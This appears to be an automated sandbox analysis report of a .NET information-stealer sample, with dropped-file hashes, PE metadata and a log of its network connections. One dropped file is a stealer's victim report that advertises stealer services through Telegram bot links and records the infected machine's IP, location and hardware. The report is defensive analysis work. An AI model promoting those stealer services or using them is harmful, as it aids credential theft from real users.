              Preview:TQDFJHPUIUELSDZVLDSOEPJOAGZMFPGEGXRLLWCATKTXUFCCYBMLLTOAWXCBRXEASQCNMLCVLTUZVHIGECOSKDAKWRYISSWUBTJPNWVMOQIBOVCDGZBZLOBWHRRJWCIVVOOXQYXMXXZMUJFNAGIRMQEQNBGKVATBJCBUBSWVZNUBPOSGZZKDLPMWNJJYMXSJFTKODUAYUUUFMAXNGYJPXGZQGSVLQUGDVVRJNEOKUCNTIRLLCNKTYMTQNZJJKSKBSONPJUKRASZVNLIXIMVFHLBZMMQBRQMADRKDIUMEEGDUNISFUQIECDZCRHSRRYZPGKJVXJOWYFDCIFWRPIQIGFARPTXNAEOTZASGGBUAORTYTQKACAIMSIJTKMTNMLSJSOHBNKDCPBUROQGRJNZUWHAQAOIYBGRJZNQFPXFARCDCRYDEHQKZSBWQRIZUALGAGONASBDAUUWWGWMIACXEKQGBFHNSVOMSMNKHUCCICMZPSQBAOJSAJLHYYTHCBOJYRGLPACKOYWSINXQWZTVPZZGDMLUEMLVMWGYQVWJXSKGMTZXFWDQTDCMARKFNKCUZOJJCUBDFZIQECIQSBZWGGGYXJKXBOJMSDVJPFGXNBLAVKQLERCTILRLNODWOHUHAHUKXKKYDMHZJUTFVHEQDYGBYCPPMSUVFTBPYSDWSPRWOOVOMFFXVHKXCQNSANIDGQLMMNSDROMFQDXTGDYVZZKZMXJGFRGTCUUWAEMNPZJJQANNDMULSUEIOQHQUZBJGBBFBYEITVHYSXFUDFMPLOAIHQGZLPYMHUKXYLKLKILTNDAXWVKITWAKIJERKCLMHSEKWBLLPKKZZWHXZMSHTTCPRPQUXXDNKWNYSNTNWEZAVSUMPTOQBTAMVGRIMPCIHLVZDKXOJHRUGCUCYCCGSKYZFHLNROAETESAVZHHZSEDGXUMPIWCICTRSGZRIRINHSZURTKUBQMVZLOYEFVZZTFCGUJKCBMMLKUJTDVWC
              Process:C:\Users\user\Desktop\dBvNa2pTbj.exe
              File Type:ASCII text, with very long lines, with CRLF line terminators
              Category:dropped
              Size (bytes):1026
              Entropy (8bit):4.697771666106845
              Encrypted:false
              SSDEEP:24:TwdgExX6lswcsA1Wo1+js3mQmFlw2UJh6QHssg9RGVQ8:T6KiV+KmQmFwhtMp9RGVH
              MD5:D910958AF930D9DCA27D8F529EC053D0
              SHA1:321478679C760C347743149A323469AD4BFEA87D
              SHA-256:C70010ABE33AC34A7DB2F84B5ECDEA5EF95D482B69138707C126D2C1C1B67F37
              SHA-512:0BCADFF480F8F0C7E5DDC316F678564A75785640F151ACA644CABE64AD10D0D4AD6156385A4B04DF9025C6ADCDB3787123EC21F57610F1A7FBC7727A12EB8A00
              Malicious:false
              Preview:TQDFJHPUIUELSDZVLDSOEPJOAGZMFPGEGXRLLWCATKTXUFCCYBMLLTOAWXCBRXEASQCNMLCVLTUZVHIGECOSKDAKWRYISSWUBTJPNWVMOQIBOVCDGZBZLOBWHRRJWCIVVOOXQYXMXXZMUJFNAGIRMQEQNBGKVATBJCBUBSWVZNUBPOSGZZKDLPMWNJJYMXSJFTKODUAYUUUFMAXNGYJPXGZQGSVLQUGDVVRJNEOKUCNTIRLLCNKTYMTQNZJJKSKBSONPJUKRASZVNLIXIMVFHLBZMMQBRQMADRKDIUMEEGDUNISFUQIECDZCRHSRRYZPGKJVXJOWYFDCIFWRPIQIGFARPTXNAEOTZASGGBUAORTYTQKACAIMSIJTKMTNMLSJSOHBNKDCPBUROQGRJNZUWHAQAOIYBGRJZNQFPXFARCDCRYDEHQKZSBWQRIZUALGAGONASBDAUUWWGWMIACXEKQGBFHNSVOMSMNKHUCCICMZPSQBAOJSAJLHYYTHCBOJYRGLPACKOYWSINXQWZTVPZZGDMLUEMLVMWGYQVWJXSKGMTZXFWDQTDCMARKFNKCUZOJJCUBDFZIQECIQSBZWGGGYXJKXBOJMSDVJPFGXNBLAVKQLERCTILRLNODWOHUHAHUKXKKYDMHZJUTFVHEQDYGBYCPPMSUVFTBPYSDWSPRWOOVOMFFXVHKXCQNSANIDGQLMMNSDROMFQDXTGDYVZZKZMXJGFRGTCUUWAEMNPZJJQANNDMULSUEIOQHQUZBJGBBFBYEITVHYSXFUDFMPLOAIHQGZLPYMHUKXYLKLKILTNDAXWVKITWAKIJERKCLMHSEKWBLLPKKZZWHXZMSHTTCPRPQUXXDNKWNYSNTNWEZAVSUMPTOQBTAMVGRIMPCIHLVZDKXOJHRUGCUCYCCGSKYZFHLNROAETESAVZHHZSEDGXUMPIWCICTRSGZRIRINHSZURTKUBQMVZLOYEFVZZTFCGUJKCBMMLKUJTDVWC
              Process:C:\Users\user\Desktop\dBvNa2pTbj.exe
              File Type:ASCII text, with very long lines, with CRLF line terminators
              Category:dropped
              Size (bytes):1026
              Entropy (8bit):4.696312162983912
              Encrypted:false
              SSDEEP:24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
              MD5:83B91EFB8185C5AF5A6B60F4FE9CC2D2
              SHA1:0EB7AE1817790DFC5225A02B74A272C84FEE4240
              SHA-256:8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
              SHA-512:F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
              Malicious:false
              Preview:TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU
              Process:C:\Users\user\Desktop\dBvNa2pTbj.exe
              File Type:ASCII text, with very long lines, with CRLF line terminators
              Category:dropped
              Size (bytes):1026
              Entropy (8bit):4.6959554225029665
              Encrypted:false
              SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
              MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
              SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
              SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
              SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
              Malicious:false
              Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE
              Process:C:\Users\user\Desktop\dBvNa2pTbj.exe
              File Type:UTF-8 Unicode text
              Category:dropped
              Size (bytes):388
              Entropy (8bit):5.390986714334908
              Encrypted:false
              SSDEEP:6:ONRRCu1mzTgJ2vNNyvc8DoTpKWUkQMKw3NNpP4PdIUtLW2MSE1EWWYufTn:QsfzTgsFEvch/zqPdISLWSEivYYTn
              MD5:A6B0CE1A3651955F68066B531AB1B4D6
              SHA1:0272A7B8F591012702B715DA4DEF907C7E0706D6
              SHA-256:128812B27DC5D33CD920227C4B95E1A38300E321D15D1089B150573921E424E9
              SHA-512:60A37A42532CBE488595A879CC2FDB0D06C77BB93A60695B25D5BE7946CD197E42DA8A0B0AEE5092612CDB400B123F007099D1C9864C26C0AF38F823DD6E4646
              Malicious:false
              Preview:Absolutely free Ginzo Stealer: https://t.me/ginzostealer_bot.Buy holdthismoney's Stealer: https://t.me/holdthismoneybot..Report Date & Time: 7/13/2022 6:20:48 AM..IP Address: 84.17.52.14 (zipcode: 8001).Country & City: CH, Z..rich..OS: Windows 10 Pro (x64 BIT).PC Name: 287400.Username: user.Resolution: 1280x1024..GPU: 86G2ATNK.CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.RAM: 4094MB
              Process:C:\Users\user\Desktop\dBvNa2pTbj.exe
              File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):827782
              Entropy (8bit):7.945649941698491
              Encrypted:false
              SSDEEP:12288:pe+N8GD7EphA9kaMfoQjfB5upQhKqTdFuIOcS4UjKWxrZvJ9C25pge4f4yyZ4ty:prN8nA9qLIK7uImmCrZvJ9B5v4Qyc9
              MD5:C2812A2B3889A3C553A58365DC4439E1
              SHA1:723AA6892D8DF11D96FEF0CCA86F5BE659C90BE6
              SHA-256:B84C9E3654208FBBD0711EF9B751759A1AA5029158C61D91F5FF058FD2655128
              SHA-512:45B63151854C25328F102436E7A0D8C19632D346C7B561CF544D5DDE0F1FA950A437F36A9748895FEF75AF032F6140640B00EDAB07E29556DC11E006A55F53E0
              Malicious:false
              Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....,Gy.s...$.A('..`c.......6,Nk..xwY. .s0I$I..$P.D.L.....&.......B.%..W......|..oUw...s....<s..........YY...n.U..o.....X..wj~7..............;>2be....U.K....ccv~LL.N.c....#......_......o.a.....w|....m..b...|P`u..u..p....Xn....K3.\y.<k.9.d..=......b..be.9...#..U_...2R...m....)<(.....+.x.....q.{.b.....f.^.i`e...f......g.o..C.k.oa..b.r.`.$.....f...:o.......?.74F.Ds.....c....&1.>n.......h.L\...c...X.-...f.}. e....S.........$v{b9.>a..V..?. ....[..%..R1.W..9..-Gu...x(..B.^.1..h.....c...?...N_.....;>,...\...G...<....6..6...o...`.......'..5..q...M.a.X.....8.B.....XZ..;.&..{...4..Ov2..SZ.h)........?A......g......W)Y.bg..Cu..o)....Ge.e..T.7..',..4`...5!..g...[...K.8.h..i..#1....f).3,.`..|],..h4....z.....5H.....?....:}.>8.G.b.].....p.kk... ..X.c.....8.cT..h....a`.m.e{X..,-......=.F..........h2...).S..2...`..... .............`/.^.....lH.@.o...:.H:|o.[0...?..c.x..
              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Entropy (8bit):6.02655869721
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              • Win32 Executable (generic) a (10002005/4) 49.96%
              • Win16/32 Executable Delphi generic (2074/23) 0.01%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              File name:dBvNa2pTbj.exe
              File size:429568
              MD5:628e04a5c298a35bd396b74a42d237fe
              SHA1:d90d76f790f1ad0ab95c3bd4bb4fb8dcada77691
              SHA256:66a0c9b894ef78540ddf8b1909b3a227789df7bd4ddcdf5cb3aaf4098493c296
              SHA512:6f1204163ac327166d59038d5b859471a45f94e99c5254cad16ef33ab9db7c48cff3da55312ddfc30b34079efcc6101a4dbd7445bf19ce05af4a94fbea490746
              SSDEEP:12288:Ibf2i6btFx5Uf7moCqUSg6R43gcWc2yUWDcJIhs04Fkaatvap0+o1VhCHfZn7o50:IbP0th5LqU
              TLSH:FA94459D726072DFC857D472DEA82DA8EA6174BB931F4203902715ADEE4D89BCF140F2
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D............"...0..v...............@... ....@.. ....................... ............`................................
              Icon Hash:00828e8e8686b000
              Entrypoint:0x46e00a
              Entrypoint Section:
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x9BB84413 [Mon Oct 14 18:48:51 2052 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
              Instruction
              jmp dword ptr [0046E000h]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x24dc40x57.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x6c0000x556.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x700000xc.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x24d680x38.text
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x6e0000x8
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x240000x48.text
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              X99^i@0x20000x20b140x20c00False1.0003801884541985data7.998809128626319IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .text0x240000x4739c0x47400False0.3114412006578947data4.3569361501714585IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rsrc0x6c0000x5560x600False0.3977864583333333data3.906257383176619IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              0x6e0000x100x200False0.044921875data0.12227588125913882IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .reloc0x700000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountry
              RT_VERSION0x6c0a00x2ccdata
              RT_MANIFEST0x6c36c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
              DLLImport
              mscoree.dll_CorExeMain
              TimestampSource PortDest PortSource IPDest IP
              Jul 13, 2022 06:20:45.674350977 CEST49751443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:45.674421072 CEST44349751188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:45.674516916 CEST49751443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:45.703902006 CEST49751443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:45.703943014 CEST44349751188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:45.758271933 CEST44349751188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:45.758399010 CEST49751443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:45.763750076 CEST49751443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:45.763766050 CEST44349751188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:45.764003038 CEST44349751188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:45.868021965 CEST49751443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.185838938 CEST49751443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.232492924 CEST44349751188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.296497107 CEST44349751188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.296587944 CEST44349751188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.296664000 CEST49751443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.305094957 CEST49751443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.325908899 CEST49752443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.325984955 CEST44349752188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.326116085 CEST49752443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.326513052 CEST49752443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.326543093 CEST44349752188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.367347956 CEST44349752188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.386209965 CEST49752443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.386254072 CEST44349752188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.497318029 CEST44349752188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.497467041 CEST44349752188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.497581959 CEST49752443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.498522043 CEST49752443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.501075029 CEST49753443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.501107931 CEST44349753188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.501200914 CEST49753443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.501533031 CEST49753443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.501543999 CEST44349753188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.544661045 CEST44349753188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.547252893 CEST49753443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.547281981 CEST44349753188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.663964033 CEST44349753188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.664113998 CEST44349753188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.664231062 CEST49753443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.665155888 CEST49753443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.669605970 CEST49754443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.669662952 CEST44349754188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.669770002 CEST49754443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.670202971 CEST49754443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.670229912 CEST44349754188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.711256981 CEST44349754188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.714297056 CEST49754443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.714335918 CEST44349754188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.798495054 CEST44349754188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.798739910 CEST44349754188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.798850060 CEST49754443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.799631119 CEST49754443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.803049088 CEST49756443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.803105116 CEST44349756188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.803215981 CEST49756443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.803572893 CEST49756443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.803594112 CEST44349756188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.846071005 CEST44349756188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.849847078 CEST49756443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.849869013 CEST44349756188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.974330902 CEST44349756188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.974487066 CEST44349756188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.974571943 CEST49756443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.975630999 CEST49756443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.987112045 CEST49757443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.987185001 CEST44349757188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:46.987303019 CEST49757443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.987763882 CEST49757443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:46.987793922 CEST44349757188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:47.029351950 CEST44349757188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:47.043766022 CEST49757443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:47.043832064 CEST44349757188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:47.145858049 CEST44349757188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:47.145976067 CEST44349757188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:47.146090984 CEST49757443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:47.146933079 CEST49757443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:47.182837009 CEST49758443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:47.182905912 CEST44349758188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:47.183003902 CEST49758443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:47.183473110 CEST49758443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:47.183499098 CEST44349758188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:47.227729082 CEST44349758188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:47.230526924 CEST49758443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:47.230581999 CEST44349758188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:47.365338087 CEST44349758188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:47.365533113 CEST44349758188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:47.365678072 CEST49758443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:47.366403103 CEST49758443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:47.369034052 CEST49759443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:47.369095087 CEST44349759188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:47.369239092 CEST49759443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:47.369530916 CEST49759443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:47.369554996 CEST44349759188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:47.414551973 CEST44349759188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:47.417434931 CEST49759443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:47.417493105 CEST44349759188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:47.549200058 CEST44349759188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:47.549357891 CEST44349759188.114.96.3192.168.2.5
              Jul 13, 2022 06:20:47.550031900 CEST49759443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:47.551134109 CEST49759443192.168.2.5188.114.96.3
              Jul 13, 2022 06:20:48.775672913 CEST49765443192.168.2.5136.243.172.101
              Jul 13, 2022 06:20:48.775712013 CEST44349765136.243.172.101192.168.2.5
              Jul 13, 2022 06:20:48.775803089 CEST49765443192.168.2.5136.243.172.101
              Jul 13, 2022 06:20:48.776513100 CEST49765443192.168.2.5136.243.172.101
              Jul 13, 2022 06:20:48.776530027 CEST44349765136.243.172.101192.168.2.5
              Jul 13, 2022 06:20:48.861736059 CEST44349765136.243.172.101192.168.2.5
              Jul 13, 2022 06:20:48.861856937 CEST49765443192.168.2.5136.243.172.101
              Jul 13, 2022 06:20:48.865031004 CEST49765443192.168.2.5136.243.172.101
              Jul 13, 2022 06:20:48.865044117 CEST44349765136.243.172.101192.168.2.5
              Jul 13, 2022 06:20:48.865276098 CEST44349765136.243.172.101192.168.2.5
              Jul 13, 2022 06:20:48.867708921 CEST49765443192.168.2.5136.243.172.101
              Jul 13, 2022 06:20:48.893956900 CEST44349765136.243.172.101192.168.2.5
              Jul 13, 2022 06:20:48.894053936 CEST44349765136.243.172.101192.168.2.5
